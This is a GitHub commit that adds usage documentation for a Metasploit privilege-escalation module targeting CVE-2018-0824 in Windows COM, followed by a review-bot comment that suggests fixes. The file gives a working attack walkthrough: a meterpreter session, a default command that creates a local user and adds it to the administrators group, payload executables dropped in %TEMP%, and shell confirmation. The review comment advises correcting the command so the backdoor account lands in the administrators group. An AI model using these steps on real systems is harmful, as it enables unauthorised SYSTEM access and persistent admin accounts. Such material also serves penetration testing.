Adding documentation

As there was no escalate folder, I have created one to maintain my documentation; kindly suggest if there are any issues.
7echSec 2018-08-30 21:13:33 +05:30 committed by GitHub
parent 0aac9a4881
commit 9f13d0fc56
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed file with 111 additions and 0 deletions


@ -0,0 +1,111 @@
## Overview
This is a post exploitation module for local privilege escalation bug which exists in Microsoft COM for windows when it fails to properly handle serialized objects.
* https://www.phpmyadmin.net/downloads/
* https://github.com/codewhitesec/UnmarshalPwn/
* https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0824
## Module Options
"POCCMD" This command will be executed on successful exploitation.</br>
"SESSION" The session to run this module on.
## Limitations
The payload will not spawn ant independent session it simply creates process with the system privilege.
If the system is not vulnerable, then payload will execute but new process will not spawn.
## Verification steps
If you want to confirm the vulnerability before you add user or perform any other sensitive action.
1. `set POCCMD /s notepad.exe`
2. `run`
Confirmation:
Then go to meterpreter session and confirm running process (ps)
If you see notepad.exe running as SYSYEM then that is as indication of vulnerable system.
## Usage
```
meterpreter > getuid
Server username: PC2\test
meterpreter > sysinfo
Computer : PC2
OS : Windows 10 (Build 17134).
Architecture : x64
System Language : en_US
Domain : PSS
Logged On Users : 12
Meterpreter : x64/windows
meterpreter > background
[*] Backgrounding session 2...
msf > use post/windows/escalate/unmarshal
msf post(windows/escalate/unmarshal) > show options
Module options (post/windows/escalate/unmarshal):
Name Current Setting
---- ---------------
POCCMD /k net user msfuser msfpass /add && net localgroup administrators msf /add
READFILE c:\boot.ini
SESSION
msf post(windows/escalate/unmarshal) > set session 2
msf post(windows/escalate/unmarshal) > run
[!] SESSION may not be compatible with this module.
[*] exe name is: oQT0yWT834.exe
[*] poc name is: sJ76Il3UGj.sct
[*] Reading Payload from file /usr/share/metasploit-framework/data/exploits/CVE-2018-0824/UnmarshalPwn.exe
[!] writing to %TEMP%
[+] Persistent Script written to C:\Users\test\AppData\Local\Temp\oQT0yWT834.exe
[*] Reading Payload from file /usr/share/metasploit-framework/data/exploits/CVE-2018-0824/poc_header
[!] writing to %TEMP%
[+] Persistent Script written to C:\Users\test\AppData\Local\Temp\sJ76Il3UGj.sct
[*] Reading Payload from file /usr/share/metasploit-framework/data/exploits/CVE-2018-0824/poc_footer
[*] Starting module...
[*] Location of UnmarshalPwn.exe is: C:\Users\test\AppData\Local\Temp\oQT0yWT834.exe
[*] Location of poc.sct is: C:\Users\test\AppData\Local\Temp\sJ76Il3UGj.sct
[*] Executing command : C:\Users\test\AppData\Local\Temp\oQT0yWT834.exe C:\Users\test\AppData\Local\Temp\sJ76Il3UGj.sct
Query for IStorage
Call: Stat
End: Stat
Query for IMarshal
Call: GetMarshalSizeMax
Unknown IID: {ECC8691B-C1DB-4DC0-855E-65F6C551AF49} 0000020CA320CDB0
Query for IMarshal
Call: GetUnmarshalClass
Call: GetMarshalSizeMax
Call: MarshalInterface
[*] Post module execution completed
Confirmation
Back in Meterpreter Session
meterpreter > shell
Process 3936 created.
Channel 185 created.
Microsoft Windows [Version 10.0.17134.1]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\temp\un>net user
net user
User accounts for \\PC2
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
User msfuser sshd
sshd_server test WDAGUtilityAccount
The command completed successfully.
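Review bot: the default POCCMD shown under `show options` creates user `msfuser` but then adds a different name to the administrators group (`/k net user msfuser msfpass /add && net localgroup administrators msf /add`), so the second half fails, and the confirmation at the end of the file (a bare `net user` listing) can never reveal that; use the same account in both halves and confirm with `net localgroup administrators` so the reader sees the account actually landed in the group. Several smaller things in the same file: `show options` also lists a READFILE option (`c:\boot.ini`) that the Module Options section never documents, so either describe it or drop it from the transcript; the first reference link (https://www.phpmyadmin.net/downloads/) has nothing to do with CVE-2018-0824 and looks pasted by mistake; in the verification step `set POCCMD /s notepad.exe`, check whether `/s` is really what you want, since the default value starts with `/k` and so the option appears to be passed straight to cmd.exe, where `/c` or `/k` is what launches a command; the transcript contains `[!] SESSION may not be compatible with this module.`, which points at the module's session/platform compatibility declaration needing a fix rather than at normal output to document; the Limitations section should say whether the two files dropped in %TEMP% (`oQT0yWT834.exe` and `sJ76Il3UGj.sct`) are removed afterwards, and the `[+] Persistent Script written to ...` message is misleading for a one-shot executable and .sct; and the typos: `</br>` after the POCCMD description should be `<br>` or a plain line break, "ant independent session" should be "an independent session", "as indication" should be "an indication", and "SYSYEM" should be "SYSTEM".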